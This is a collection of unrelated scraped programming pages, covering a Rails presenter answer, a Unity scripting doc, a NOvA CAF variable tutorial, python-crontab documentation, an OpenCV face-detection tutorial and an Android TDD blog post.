I was browsing the source code of this gem and I found a use of content_tag that confuses me a lot. def render(view) view.content_tag(name, attributes[:content], attributes.except(:content)) end Most commonly, content_tag is called in the context of a view - so, you don't need to call view.content_tag because the view knows how to respond to content_tag (and simply calling content_tag is the same as calling self.content_tag). The render method that you're showing exists within the class MetaTag which inherits from Tag. Tag is a plain old Ruby object (PORO), so it doesn't know how to respond to content_tag. But, as you can see, the render method takes a view as an argument. And, naturally, the view object knows how to respond to content_tag. So, calling view.content_tag is the way that MetaTag is able to render the content tag. This is pretty much an instance of the Presenter Pattern (different people use different terms). Ryan Bates has a good RailsCast on this here. To your question in the comments, Rails doesn't "know" that view is an instance of ActionView::Base. You have the responsiblity of passing in an actual view instance. I tend to pass in the controller so that I have access to the view and params. Maybe something like this: class FooController < ApplicationController def foo_action FooPresenter.present(self) end end and... class FooPresenter class << self def present(controller) new(controller).present end end # class methods #=================================================================== # instance methods #=================================================================== def initialize(controller) @controller = controller end def present content_tag :div, data: {foo: params[:foo]}, class: 'bar' end private def controller() @controller end def view() controller.view_context end def params() controller.params end def method_missing(*args, &block) view.send(*args, &block) end end By including the method_missing method, I no longer have to call view.content_tag. I can just call content_tag. FooPresenter won't find the method, so will send the call onto the view where the method will be found and executed. Again, Ryan does a great job explaining all of this.
https://codedump.io/share/P9cqf811MQPo/1/rails-contenttag-method
CC-MAIN-2017-43
refinedweb
341
67.76
The time this frame has started (Read Only). This is the time in seconds since the last level has been loaded. This is the time in seconds since the last level was loaded. This is Read-Only. //Attach this script to a GameObject //Create a Button (Create>UI>Button) and a Text GameObject (Create>UI>Text) //Click on the GameObject and attach the Button and Text in the fields in the Inspector //This script outputs the time since the last level load. It also allows you to load a new Scene by pressing the Button. When this new Scene loads, the time resets and updates. using UnityEngine; using UnityEngine.SceneManagement; using UnityEngine.UI; public class TimeSinceLevelLoad : MonoBehaviour { public Button m_MyButton; public Text m_MyText; void Awake() { //Don't destroy the GameObject when loading a new Scene DontDestroyOnLoad(gameObject); //Make sure the Canvas isn't deleted so the UI stays on the Scene load DontDestroyOnLoad(GameObject.Find("Canvas")); if (m_MyButton != null) //Add a listener to call the LoadSceneButton function when the Button is clicked m_MyButton.onClick.AddListener(LoadSceneButton); } void Update() { //Output the time since the level loaded to the screen using this label m_MyText.text = "Time Since Loaded : " + Time.timeSinceLevelLoad; } void LoadSceneButton() { //Press this Button to load another Scene //Load the Scene named "Scene2" SceneManager.LoadScene("Scene2"); } }
https://docs.unity3d.com/kr/2019.3/ScriptReference/Time-timeSinceLevelLoad.html
CC-MAIN-2020-24
refinedweb
215
58.28
Novaart » The NOvA Offline Workbook » Christopher Backhouse, 04/05/2016 05:48. Comments and feedback are welcome. The _if you see something, say something_ policy applies here, it's a wiki! h2. Goal Our goal is to add a variable that stores the number of bad channels in a subrun, for example. For illustration purposes, we have decided we are going to include that variable in the header branch. !add-var.png! h2. Step 1: Download packages Under development release (if you think you will be committing your work to the repository) or in any stable tag (if you do not know yet) and after setting up your environment <pre> srt setup -a </pre> download the following packages (for this example) * StandardRecord * CAFMaker using the command <pre> addpkg_svn -h <pkg name> </pre> h2. Step 2: Define the object Note: In this example, this step is equivalent to step 7 in the pdf version (docdb-12273). Since we want to put our variable into the header branch (hdr) we open StandardRecord/SRHeader.h and add the type, name and a brief description of it at the end of the file <pre> <code class="cpp"> namespace caf { class SRNumuSandbox{ public: ... unsigned int nbadchan; ///< Number of bad channels in a subrun. This is our new variable! void setDefault(); }; } </code> </pre> h2. Step 3: Update class version Open StandardRecord/classes_def.xml and update the class version index from _i_ to _i+1_ <lcgdict> <class name="caf::SRHeader" ClassVersion="22" > </lcgdict> <class name="caf::SRHeader" ClassVersion="23" > h2. Step 4: Compile After saving file the previous changes, go to your $SRT_PRIVATE_CONTEXT area compile StandardRecord package <novagpvm08.fnal.gov> make StandardRecord.all You will get an error message like this (NOTE: that was the case at the time of writing the pdf version of this tutorial) ... class caf::SRLid <**compiling**> StandardRecord_dict.cc <**linking**> libStandardRecord_dict.so <**checking class version numbers**> libStandardRecord_dict.so INFO: adding version info for class 'caf::SRHeader': <version ClassVersion="23" checksum="2291111394"/> WARNING: classes_def.xml files have been updated: rebuild dictionaries. make[1]: *** [/nova/app/users/jasq/devel/lib/ Linux2.6-GCC-maxopt/libStandardRecord_dict.so] Error 2 make: *** [StandardRecord.all] Error 2 h2. Step 5: Compile again The solution to the previous error is simply compile again <novagpvm08.fnal.gov> make StandardRecord.all <**compiling**> StandardRecord_map.cc <**linking**> libStandardRecord_map.so <novagpvm08.fnal.gov> h2. Step 6: Add into CAFMaker Open CAFMaker/CAFMaker_module.cc but be aware that this is gonna be a huge file. The trick is search for keywords (i.e. header). This is one of the most important parts since is in here where you are defining the instructions to put your variable into the CAF framework. ... //####################################################### // Fill header. // Get metadata information for header unsigned int run = evt.run(); unsigned int nbadchan = bc->NBadInSubRun(subrun); // This is our new variable! rec.hdr = SRHeader(); rec.hdr.run = run; rec.hdr.nbadchan = nbadchan; // This is our new variable! After this, save it. Compile make CAFMaker.all </pre> You should not get any error messages. h2. Step 7: Almost done In order to test that your variable is producing reasonable values, let's test it. You will need two things * An input ART root file (i.e. reco/pid) * A .fcl file (for example, CAFMaker/cafmakerjob.fcl or the one in the job/ folder) h2. Step 8: Produce the CAF In the area you have been working, you can produce the CAF by doing nova -c job/cafmakerjob.fcl -n 2 <input ART root file> after that, open it cafe <file_name> !result.png! Your variable has been added and filled! h2. Making it real Thinking your variable is ready for submission? Send an email to nova_offline or contact any group convener before commit. h2. References/Documentation The following material was consulted when preparing this tutorial * "Description of variables in CAFs from the NOvA art-wiki": * "Introduction to the Common Analysis Files by Dominick Rocco": * "Introduction to CAFAna framework by Gavin Davies":
https://cdcvs.fnal.gov/redmine/projects/novaart/wiki/How_to_put_a_variable_into_CAF/8/annotate
CC-MAIN-2020-40
refinedweb
655
59.8
Python Crontab API Project description Bug Reports and Development Please report any problems to the github issues tracker. Please use Git and push patches to the github reading Note: Several users have reported their new crontabs not saving automatically. At this point you MUST use write() if you want your edits to be saved out. See below for full details on the use of the write function. Getting access to a crontab can happen in five ways, three system methods that will work only on Unix and require you to have the right permissions: from crontab import CronTab empty """) Special per-command user flag for vixie cron format (new in 1.9): system_cron = CronTab(tabfile='/etc/crontab', user=False) job = system_cron[0] job.user != None system_cron.new(command='new_command', user='root') Creating a new job is as simple as: job = cron.new(command='/usr/bin/echo') And setting the job’s time restrictions: job.minute.during(5,50).every(5) job.hour.every(4) job.day.on(4, 5, 6) job.dow.on('SUN') job.dow.on('SUN', 'FRI') * * *') Setting the slice to a python date object: job.setall(time(10, 2)) job.setall(date(2000, 4, 2)) job.setall(datetime(2000, 4, 2, 10, 2)) Run a jobs command. Running the job here will not effect it’s existing schedule with another crontab process: job_standard_output = job.run() Creating a job with a comment: job = cron.new(command='/foo/bar', comment='SomeID') Get the comment or command for a job: command = job.command comment = job.comment Modify the comment or command on a job: job.set_command("new_script.sh") job.set_comment("New ID or comment here") Disabled or Enable Job: job.enable() job.enable(False) False == job.is_enabled() Validity Check: True == job.is_valid() Use a special syntax: job.every_reboot() Find an existing job by command sub-match or regular expression: iter = cron.find_command('bar') # matches foobar1 iter = cron.find_command(re.compile(r'b[ab]r$')) Find an existing job by comment exact match or regular expression: iter = cron.find_comment('ID or some text') iter = cron.find_comment(re.compile(' or \w')) Find an existing job by schedule: iter = cron.find_time(2, 10, '2-4', '*/2', None) iter = cron.find_time("*/2 * * * *") Clean a job of all rules: job.clear() Iterate through all jobs, this includes disabled (commented out) cron jobs: for job in cron: print job Iterate through all lines, this includes all comments and empty' ) Validate a cron time string: from crontab import CronSlices bool = CronSlices.is_valid('0/2 * * * *') Environment Variables Some versions of vixie cron support variables outside of the command line. Sometimes just update the envronment when commands are run, the Cronie fork of vixie cron also supports CRON_TZ which looks like a regular variable but actually changes the times the jobs are run at. Very old vixie crons don’t support per-job variables, but most do. Iterate through cron level environment variables: for (name, value) in cron.env.items(): print name print value Create new or update cron level enviroment variables: print cron.env['SHELL'] cron.env['SHELL'] = '/bin/bash' print cron.env Each job can also have a list of environment variables: for job in cron: job.env['NEW_VAR'] = 'A' print job.env. Running the Scheduler The module is able to run a cron tab as a daemon as long as the optional croniter module is installed; each process will block and errors will be logged (new in 2.0). (note this functionality is new and not perfect, if you find bugs report them!) Running the scheduler: tab = CronTab(tabfile='MyScripts.tab') for result in tab.run_scheduler(): print "This was printed to stdout by the process." Do not do this, it won’t work because it returns generator function: tab.run_scheduler() Timeout and cadence can be changed for testing or error management: for result in tab.run_scheduler(timeout=600): print "Will run jobs every 1 minutes for ten minutes from now()" for result in tab.run_scheduler(cadence=1, warp=True): print "Will run jobs every 1 second, counting each second as 1 minute"'] All System CronTabs Functionality The crontabs (note the plural) module can attempt to find all crontabs on the system. This works well for Linux systems with known locations for cron files and user spolls. It will even extract anacron jobs so you can get a picture of all the jobs running on your system: from crontabs import CronTabs for cron in CronTabs(): print repr(cron) All jobs can be brought together to run various searches, all jobs are added to a CronTab object which can be used as documented above: jobs = CronTabs().all.find_command('foo'). Descriptor Functionality If you have the cron-descriptor module installed, you will be able to ask for a translated string which describes the frequency of the job in the current locale language. This should be mostly human readable. print(job.description(use_24hour_time_format=True)) See cron-descriptor for details of the supported languages and options. Extra Support - Support for vixie cron with username addition with user flag - Support for SunOS, AIX & HP with compatibility ‘SystemV’ mode. - Python 3.5.2 and Python 2.7 tested, python 2.6 removed from support. -.
https://pypi.org/project/python-crontab/2.3.0/
CC-MAIN-2019-04
refinedweb
861
58.18
Face. Objective This tutorial will introduce you to the concept of object detection in Python using the OpenCV library and how you can utilize it to perform tasks like Facial detection. Pre-requisites Hands-on knowledge of Numpy and Matplotlib is essential before working on the concepts of OpenCV. Make sure that you have the following packages installed and running before installing OpenCV. - Python - Numpy - Matplotlib Table of Contents - OpenCV-Python - Images as Arrays - Images and OpenCV - Face Detection - Conclusion OpenCV-Python.). This makes it a great choice to perform computationally intensive programs. Installation OpenCV-Python supports all the leading platforms like Mac OS, Linux, and Windows. It can be installed in either of the following ways: 1. From pre-built binaries and source : Please refer to the detailed documentation here for Windows and here for Mac. 2. Unofficial pre-built OpenCV packages for Python. Packages for standard desktop environments (Windows, macOS, almost any GNU/Linux distribution) - run pip install opencv-pythonif you need only the main modules - run pip install opencv-contrib-pythonif you need both main and contrib modules (check extra modules listing from OpenCV documentation) You can either use Jupyter notebooks or any Python IDE of your choice for writing the scripts. Images as Arrays An image is nothing but a standard Numpy array containing pixels of data points. More the number of pixels in an image, the better is its resolution. You can think of pixels to be tiny blocks of information arranged in the form of a 2 D grid, and the depth of a pixel refers to the colour information present in it. In order to be processed by a computer, an image needs to be converted into a binary form. The colour of an image can be calculated as follows: Number of colors/ shades = 2^bpp where bpp represents bits per pixel. Naturally, more the number of bits/pixels, more possible colours in the images. The following table shows the relationship more clearly. Let us now have a look at the representation of the different kinds of images: 1. Binary Image A binary image consists of 1 bit/pixel and so can have only two possible colours, i.e., black or white. Black is represented by the value 0 while 1 represents white. 2. Grayscale image A grayscale image consists of 8 bits per pixel. This means it can have 256 different shades where 0 pixels will represent black colour while 255 denotes white. For example, the image below shows a grayscale image represented in the form of an array. A grayscale image has only 1 channel where the channel represents dimension. 3. Coloured image Coloured images are represented as a combination of Red, Blue, and Green, and all the other colours can be achieved by mixing these primary colours in the correct proportions. A coloured image also consists of 8 bits per pixel. As a result, 256 different shades of colours can be represented with 0 denoting black and 255 white. Let us look at the famous coloured image of a mandrill which has been cited in many image processing examples. If we were to check the shape of the image above, we would get: Shape (288, 288, 3) 288: Pixel width 288: Pixel height 3: color channel This means we can represent the above image in the form of a three-dimensional array. Images and OpenCV Before we jump into the process of face detection, let us learn some basics about working with OpenCV. In this section we will perform simple operations on images using OpenCV like opening images, drawing simple shapes on images and interacting with images through callbacks. This is necessary to create a foundation before we move towards the advanced stuff. Importing Images in OpenCV Using Jupyter notebooks Steps: - Import the necessary libraries import numpy as np import cv2 import matplotlib.pyplot as plt %matplotlib inline - Read in the image using the imread function. We will be using the coloured ‘Mandrill’ image for demonstration purpose. It can be downloaded from here img_raw = cv2.imread('image.jpg') - The type and shape of the array. type(img_raw) numpy.ndarray img_raw.shape (1300, 1950, 3) Thus, the .png image gets transformed into a numpy array with a shape of 1300×1950 and has 3 channels. plt.imshow(img_raw) What we get as an output is a bit different concerning colour. We expected a bright coloured image but what we obtain is an image with some bluish tinge. That happens because OpenCV and matplotlib have different orders of primary colours. Whereas OpenCV reads images in the form of BGR, matplotlib, on the other hand, follows the order of RGB. Thus, when we read a file through OpenCV, we read it as if it contains channels in the order of blue, green and red. However, when we display the image using matplotlib, the red and blue channel gets swapped and hence the blue tinge. To avoid this issue, we will transform the channel to how matplotlib expects it to be using the function cvtColor. img = cv2.cvtColor(img_raw, cv2.COLOR_BGR2RGB) plt.imshow(img) Using Python Scripts Jupyter Notebooks are great for learning, but when dealing with complex images and videos, we need to display them in their own separate windows. In this section, we will be executing the code as a .py file. You can use Pycharm, Sublime or any IDE of your choice to run the script below. import cv2 img = cv2.imread('image.jpg') while True: cv2.imshow('mandrill',img) if cv2.waitKey(1) & 0xFF == 27: break cv2.destroyAllWindows() In this code, we have a condition, and the image will only be shown if the condition is true. Also, to break the loop, we will have two conditions to fulfil: - The cv2.waitKey() is a keyboard binding function. Its argument is the time in milliseconds. The function waits for specified milliseconds for any keyboard event. If you press any key in that time, the program continues. - The second condition pertains to the pressing of the Escape key on the keyboard. Thus, if 1 millisecond has passed and the escape key is pressed, the loop will break and program stops. - cv2.destroyAllWindows() simply destroys all the windows we created. If you want to destroy any specific window, use the function cv2.destroyWindow() where you pass the exact window name as the argument. Savings images The images can be saved in the working directory as follows: cv2.imwrite('final_image.png',img) Where the final_image is the name of the image to be saved. Basic Operations on Images In this section, we will learn how we can draw various shapes on an existing image to get a flavour of working with OpenCV. Drawing on Images - Begin by importing necessary libraries. import numpy as np import matplotlib.pyplot as plt %matplotlib inline import cv2 - Create a black image which will act as a template. image_blank = np.zeros(shape=(512,512,3),dtype=np.int16) - Display the black image. plt.imshow(image_blank) Function & Attributes The generalised function for drawing shapes on images is: cv2.shape(line, rectangle etc)(image,Pt1,Pt2,color,thickness) There are some common arguments which are passed in function to draw shapes on images: - Image on which shapes are to be drawn - co-ordinates of the shape to be drawn from Pt1(top left) to Pt2(bottom right) - Color: The color of the shape that is to be drawn. It is passed as a tuple, eg: (255,0,0). For grayscale, it will be the scale of brightness. - The thickness of the geometrical figure. 1. Straight Line Drawing a straight line across an image requires specifying the points, through which the line shall pass. # Draw a diagonal red line with thickness of 5 px line_red = cv2.line(img,(0,0),(511,511),(255,0,0),5) plt.imshow(line_red) # Draw a diagonal green line with thickness of 5 px line_green = cv2.line(img,(0,0),(511,511),(0,255,0),5) plt.imshow(line_green) 2. Rectangle For a rectangle, we need to specify the top left and the bottom right coordinates. #Draw a blue rectangle with a thickness of 5 px rectangle= cv2.rectangle(img,(384,0),(510,128),(0,0,255),5) plt.imshow(rectangle) 3. Circle For a circle, we need to pass its centre coordinates and radius value. Let us draw a circle inside the rectangle drawn above img = cv2.circle(img,(447,63), 63, (0,0,255), -1) # -1 corresponds to a filled circle plt.imshow(circle) Writing on Images Adding text to images is also similar to drawing shapes on them. But you need to specify certain arguments before doing so: - Text to be written - coordinates of the text. The text on an image begins from the bottom left direction. - Font type and scale. - Other attributes like colour, thickness and line type. Normally the line type that is used is lineType = cv2.LINE_AA. font = cv2.FONT_HERSHEY_SIMPLEX text = cv2.putText(img,'OpenCV',(10,500), font, 4,(255,255,255),2,cv2.LINE_AA) plt.imshow(text) These were the minor operations that can be done on images using OpenCV. Feel free to experiment with the shapes and text. 4. Face Detection Face detection is a technique that identifies or locates human faces in digital images. A typical example of face detection occurs when we take photographs through our smartphones, and it instantly detects faces in the picture. Face detection is different from Face recognition. Face detection detects merely the presence of faces in an image while facial recognition involves identifying whose face it is. In this article, we shall only be dealing with the former. Face detection is performed by using classifiers. A classifier is essentially an algorithm that decides whether a given image is positive(face) or negative(not a face). A classifier needs to be trained on thousands of images with and without faces. Fortunately, OpenCV already has two pre-trained face detection classifiers, which can readily be used in a program. The two classifiers are: In this article, however, we will only discuss the Haar Classifier. Haar feature-based cascade classifiers Haar-like features are digital image features used in object recognition. They owe their name to their intuitive similarity with Haar wavelets and were used in the first real-time face detector. Paul Viola and Michael Jones in their paper titled “Rapid Object Detection using a Boosted Cascade of Simple Features” used the idea of Haar-feature classifier based on the Haar wavelets. This classifier is widely used for tasks like face detection in computer vision industry. Haar cascade classifier employs a machine learning approach for visual object detection which is capable of processing images extremely rapidly and achieving high detection rates. This can be attributed to three main reasons: - Haar classifier employs ‘Integral Image’ concept which allows the features used by the detector to be computed very quickly. - The learning algorithm is based on AdaBoost. It selects a small number of important features from a large set and gives highly efficient classifiers. - More complex classifiers are combined to form a ‘cascade’ which discard any non-face regions in an image, thereby spending more computation on promising object-like regions. Let us now try and understand how the algorithm works on images in steps: 1. ‘Haar features’ extraction After the tremendous amount of training data (in the form of images) is fed into the system, the classifier begins by extracting Haar features from each image. Haar Features are kind of convolution kernels which primarily detect whether a suitable feature is present on an image or not. Some examples of Haar features are mentioned below: These Haar Features are like windows and are placed upon images to compute a single feature. The feature is essentially a single value obtained by subtracting the sum of the pixels under the white region and that under the black. The process can be easily visualized in the example below. For demonstration purpose, let’s say we are only extracting two features, hence we have only two windows here. The first feature relies on the point that the eye region is darker than the adjacent cheeks and nose region. The second feature focuses on the fact that eyes are kind of darker as compared to the bridge of the nose. Thus, when the feature window moves over the eyes, it will calculate a single value. This value will then be compared to some threshold and if it passes that it will conclude that there is an edge here or some positive feature. 2. ‘Integral Images’ concept The algorithm proposed by Viola Jones uses a 24X24 base window size, and that would result in more than 180,000 features being calculated in this window. Imagine calculating the pixel difference for all the features? The solution devised for this computationally intensive process is to go for the Integral Image concept. The integral image means that to find the sum of all pixels under any rectangle, we simply need the four corner values. This means, to calculate the sum of pixels in any feature window, we do not need to sum them up individually. All we need is to calculate the integral image using the 4 corner values. The example below will make the process transparent. 3. ‘Adaboost’: to improve classifier accuracy As pointed out above, more than 180,000 features values result within a 24X24 window. However, not all features are useful for identifying a face. To only select the best feature out of the entire chunk, a machine learning algorithm called AdaBoost is used. What it essentially does is that it selects only those features that help to improve the classifier accuracy. It does so by constructing a strong classifier which is a linear combination of a number of weak classifiers. This reduces the number of features drastically to around 6000 from around 180,000. 4. Using ‘Cascade of Classifiers’ Another way by which Viola Jones ensured that the algorithm performs fast is by employing a cascade of classifiers. The cascade classifier essentially consists of stages where each stage consists of a strong classifier. This is beneficial since it eliminates the need to apply all features at once on a window. Rather, it groups the features into separate sub-windows and the classifier at each stage determines whether or not the sub-window is a face. In case it is not, the sub-window is discarded along with the features in that window. If the sub-window moves past the classifier, it continues to the next stage where the second stage of features is applied. The process can be understood with the help of the diagram below. The Paul- Viola algorithm can be visualized as follows: Face Detection with OpenCV-Python Now we have a fair idea about the intuition and the process behind Face recognition. Let us now use OpenCV library to detect faces in an image. Load the necessary Libraries import numpy as np import cv2 import matplotlib.pyplot as plt %matplotlib inline We shall be using the image below: #Converting to grayscale test_image_gray = cv2.cvtColor(test_image, cv2.COLOR_BGR2GRAY) # Displaying the grayscale image plt.imshow(test_image_gray, cmap='gray') Since we know that OpenCV loads an image in BGR format, so we need to convert it into RBG format to be able to display its true colours. Let us write a small function for that. def convertToRGB(image): return cv2.cvtColor(image, cv2.COLOR_BGR2RGB) Haar cascade files OpenCV comes with a lot of pre-trained classifiers. For instance, there are classifiers for smile, eyes, face, etc. These come in the form of XML files and are located in the folder opencv/data/haarcascades/. However, to make things simple, you can also access them from here. Download the XML files and place them in the data folder in the same working directory as the jupyter notebook. haar_cascade_face = cv2.CascadeClassifier('data/haarcascade/haarcascade_frontalface_default.xml') Face detection We shall be using the detectMultiscale module of the classifier. This function will return a rectangle with coordinates(x,y,w,h) around the detected face. This function has two important parameters which have to be tuned according to the data. - scalefactor In a group photo, there may be some faces which are near the camera than others. Naturally, such faces would appear more prominent than the ones behind. This factor compensates for that. - minNeighbors This parameter specifies the number of neighbours a rectangle should have to be called a face. You can read more about it here. faces_rects = haar_cascade_face.detectMultiScale(test_image_gray, scaleFactor = 1.2, minNeighbors = 5); # Let us print the no. of faces found print('Faces found: ', len(faces_rects)) Faces found: 1 Our next step is to loop over all the coordinates it returned and draw rectangles around them using Open CV. We will be drawing a green rectangle with a thickness of 2 for (x,y,w,h) in faces_rects: cv2.rectangle(test_image, (x, y), (x+w, y+h), (0, 255, 0), 2) Finally, we shall display the original image in coloured to see if the face has been detected correctly or not. #convert image to RGB and show image plt.imshow(convertToRGB(test_image)) Here, it is. We have successfully detected the face of the baby in the picture. Let us now create a generalized function for the entire face detection process. Face Detection with a generalized function def detect_faces(cascade, test_image, scaleFactor = 1.1): # create a copy of the image to prevent any changes to the original one. image_copy = test_image.copy() #convert the test image to gray scale as opencv face detector expects gray images gray_image = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY) # Applying the haar classifier to detect faces faces_rect = cascade.detectMultiScale(gray_image, scaleFactor=scaleFactor, minNeighbors=5) for (x, y, w, h) in faces_rect: cv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 15) return image_copy Testing the function on a new image This time test image is as follows: # Converting to grayscale test_image_gray = cv2.cvtColor(test_image, cv2.COLOR_BGR2GRAY) # Displaying grayscale image plt.imshow(test_image_gray, cmap='gray') #call the function to detect faces faces = detect_faces(haar_face_cascade, test_image2) #convert to RGB and display image plt.imshow(convertToRGB(faces)) Testing the function on a group image Let us now see if the function works well on a group photograph or not. We shall be using the picture below for our purpose. PC: The Indian Women’s Cricket Team. #call the function to detect faces faces = detect_faces(haar_cascade_face, test_image2) #convert to RGB and display image plt.imshow(convertToRGB(faces)) You can access the entire source code from here. Conclusion In this tutorial, we learned about the concept of face detection using Open CV in Python using Haar cascade. There are a number of detectors other than the face, which can be found in the library. Feel free to experiment with them and create detectors for eyes, license plates, etc.
https://parulpandey.com/2019/01/22/face-detection-with-python-using-opencv/
CC-MAIN-2022-21
refinedweb
3,144
64.41
I've thought a bit about my TDD limitations on Android and my discovery of the GoLang-y nature of interfaces. For the TopStoriesAdapter.ViewHolder to be tested; we can create a wrapper for other controls... Now I understand why Android didn't do it originally; performance; TDD was new... Lots of stuff. Sooo.... I think I'm going to be developing my own set of Widgets with a growing interface (not doing it sweeping). It should enable TDD... but it'll also create a ton of "crap". I don't really think this will be a recommended path for production code; where I'd recommend minimizing UI bound code; and test what can be via unit; and UI Test the rest. This isn't production; this is me getting to do things my way. And... wow it's a bit of a round and round to get just the RecyclerView interfaced up. Ruthless Refactoring I'm running tests to fix up some code coverage. ... I didn't TDD a piece... :( My failure to have TDD'd a chunk of code has caused 3 tests to fail when I got test coverage improved. This didn't change the production code. It just modified behavior of the tests; which broke 3 when I fixed 1. This shows that TDD even makes TESTS mode robust... ... Yea... TDD makes TESTS better... I continue to make myself suffer the pangs of unpaired (and let's be honest; poor TDD) as it SO VERY PAINFULLY shows the power of power of pairing and TDD. Lessons I won't forget as it beats the importance of the practices into my head... Excluding the Activities, wrapper-widgets, and unimplemented failure paths - I have 100/100 code coverage on all things except one... The Adapter. Which... kinda makes sense since that's what I spent a bunch of time writing wrapper classes for... before getting distracted by some RUTHLESS REFACTORING!!! Testing The Adapter The adapter needs testing. It needed a few wrapper classes. All of them so far, actually. I'd actually never thought to test the Adapter. Well.... I thought to; then thought; <whiny>but it's UI; that's hard to test. I can justify not doing it. UI is a boundary; it's OK</whiny> In the end; No. It's not OK to "not test". YES there are exceptions; YES; you won't get 100/100 for EVERYTHING (nor should you REALLY care). But "hard" isn't a reason not to test. Challenging isn't a reason not to test. As The adapter isn't really a UI. It's just extending an android control which isn't testable. Which; BTW Google - FOR SHAME! The RecyclerView is plenty new that good practices should start to be applied!!! I don't even have a null guard on the adapter... DEEP SIGH ... I'm better than that... I think/hope. :) I'm working through some tests on the Adapter; I think I need to get the ViewHolder down first... Holy hell... OK - I have a few widget wrappers... and the RecyclerView is wrapped... and with all the code updated to use these controls... I ran it... and ... it... uhh... Worked. Honestly; I did not expect that. Now - Classes!!! Since the UI wrapping works... I can start writing the backend code... yea... ... It makes sense. I've been adding some of the classes to support the additional information in the StoryJson. Through this process I found a lot of commonality in the "Primitive Wrapper" classes. Which means I did a bunch of Copy & Paste. Extracted the commonality into what I expect will grow into a nice collection of ObjectOrientedDesign base classes. I hope anyway. That way I have a structure to help direct my building. In my refactor and wrapping of the UI; I have the QacTextView with the setText method; but I dislike the implied "UI Widget" being part of some baser classes. With a "SetText" interface with a "setText" method... starting to get into "mix-in" territory. I'll be keeping an eye on this kinda functionality to see if it can refactor into something with jargon. I see some more common behavior with the duplicated code that may be simplified in another way besides the SimpleWrapper... Gotta keep it in mind; but I don't have a good solution yet. Unholy Hell I made the UI wrapping stuff to be able to pass in mocked versions of the UI... Something I'd used in the past wasn't working. I didn't think much about it; I thought I had everything correct. I didn't. I think I'll have to roll back the wrapping changes. A fantastic learning experience; but... I don't think it is the correct path moving forward. I've been wondering what I was missing such that the wrapping has never come up before - I found it. Just use byte manipulation to rip out the final stuff. Instead of making progress... refactor out the stuff I refactored in! Weeee... Waste of Time Was the changes trying to wrap the UI a waste of time? No. Absolutely not. I learned things. The Law of Two Feet says that if I feel I was learning; then it's an appropriate course of action to be on. I learned a new thing about Java. I explored it. It has potential in some situations. I'm actually exploring using it in a more confined role. In my Object classes; like Author public class Author extends SimpleWrapper<String> { public final static Author NullAuthor = new Author("{{ Loading Author }}"); public Author(final String author) { super(author); } @Override protected void validate(final String author) { if(Strings.isNullOrEmpty(author)){ throw new IllegalArgumentException("author can not be null");} } public void authorInto(final SetText item) { if(item == null){ return; } item.setText(value()); } } In particular the authorInto (name in flux) method public void authorInto(final SetText item) { if(item == null){ return; } item.setText(value()); } SetText is an interface with a signature matching TextView#setText (creative naming; right?). This allows an object to have no dependency on UI widgets, but still able to interact with them. This was the first interface I made for wrapping; to do exactly this. As expanding to all controls is kinda out; I want to keep it in this limited focus to allow interactions without the UI dependency. Will it work? No idea Should be fun to find out. ... I've been trying to write tests for the ViewHolder. I've been writing code towards this goal for about 12 hours. I still have no tests. Upside; I don't feel any of it is wasted. A lot of learning and a better understanding. Plus a solid grasp of the technique I'm going to apply to be able to effectively test. I'm now set up to save hours whenever I encounter this type of situation again. 12 hours consumed; but uncountable hours saved from being able to test UI components... in theory. Gotta actually prove I can write those tests now. ... Early results seem to support the wrapping for controls which get content set. ... Continued work shows that the SetText interface keeps the class API clean. There's no "UI Widget" in a "data bag" (not really data bag, but close enough for now) ... Looking at setting up a # [minutes|hours|days] ago and being lazy about doing the calculations ('cause someone's figured it out already) and found that android already has this via the android.text.format.DateUtils; Specifically the getRelativeTimeSpanString method. I was implementing a translation from unix time to a Date object; but via that method taking longs; looks like I can skip that piece. ... frack... DateUtils is a stubbed implementation. This does free us from some things because we can assume that it works. We don't need to test it. Need to wrap this though. It's an instance; much like the use of LayoutManager#from in the TopStoriesAdapter; that is tightly coupled to Android. We need to break this coupling. These are boundary points of the app which often require the exceptions which prove the rule. I'll address the DateUtils first... in which I mean I'm going to frown at the fact that Google's gone the route of a static method... This is non-trivial to work around. Once I spend some time on it; we'll see how hard it is. I'll need this same approach for the LayoutManager. I understand using them in the early days ( DateUtils was added in API 3) when there was a significant concern over speed and memory; which a bunch of extra class instances would have affected... just a constraint at better development practices now. FyzLog'd My refactor work for logging in android is being applied here. I'm creating a wrapper around the android DateUtils and creating slugs which I can flip from tests to do something different; but still something. It's clean; a bit odd, which I've been freely admitting. It's a boundary that can't be TDD'd otherwise. It's a requirement due to the limitations forced from the Android OS. YAGNI For the StoryComments; I'd included StoryId in the constructor because I'll need it... later. I ripped that out. It was sitting there doing nothing; and I had to re-arrange some code to test something else. An unused piece of code was making me re-write and write differently... That's a paddling, now it's gone. Working All of the Story properties are being populated and displayed. This took a bit of working through setting up all the Objects representing these. I'm really happy with all the work that's gone into setting up the UI testability. While I still need to approach this with the Activity; the Adapter is looking amazing. The TopStoriesAdapter which was at about 0% for method coverage and line coverage is now at 100% for both. I said I'd need to re-work the LayoutManager so the Adapter isn't tightly bound to it; ehhh.... I'm gonna hold off on it for now. The only thing to test is either implementation or effects that would crash the app when running. The boundaries get a little flexibility; here's one I'm going to flex on. All the data is loading. FULL DATA ACHIEVED! Learning Happened I feel I have gotten a lot of value out of working through this post. More than any other so far. There are some major points that stand out to me from everything I did through this post. They all fall into the "Object Oriented Design" bucket. I've mentioned earlier in this post series of how I want to enforce encapsulation and not be returning data. This is in direct conflict of not polluting a class with dependencies on UI widgets. I found a way to satisfy both. While the interface is ui-centric right now, easily adjusted. The usage of the wrapping class allows us to change the interface to something that isn't a signature match to UI widgets. setAsString? Sure. Now it's just a naming issue... and sometimes I'd rather work on caching. The encapsulation I've been striving to find a satisfying answer to... done. I'm very pleased with this result. I think it'll be a hard sell because "it's not default controls" ... Well... I have to fight for encapsulation first. :) The encapsulation ties into the other aspect of Object Oriented Design; It massively simplifies the code. If's exist only as guard clauses. This will change once I show why I call part of the pattern a Mediator. The DateUtils adjustment at the end demonstrates the power of the design patterns to remove the need for branching logic. If there's any desire to read up on the process I went through with that; read the Logger Refactor series. An additional simplification of the code from using a lot of objects is allowing each object to focus on a single thing. This is the "Single Responsibility" principle that people think they follow. In this case; the Story class knows only about the "Story" concept. It knows it needs a "title" but not what makes a title a title. Just that when it's built; it can't be null. Story doesn't know that the value inside a title can't be null or empty public class Title ... @Override protected void validate(final String input) { if(Strings.isNullOrEmpty(input)) { throw new IllegalArgumentException("title can not be null or empty"); } } Story doesn't need to know anything about how time is calculated and any conversions that need to occur. UnixTime? 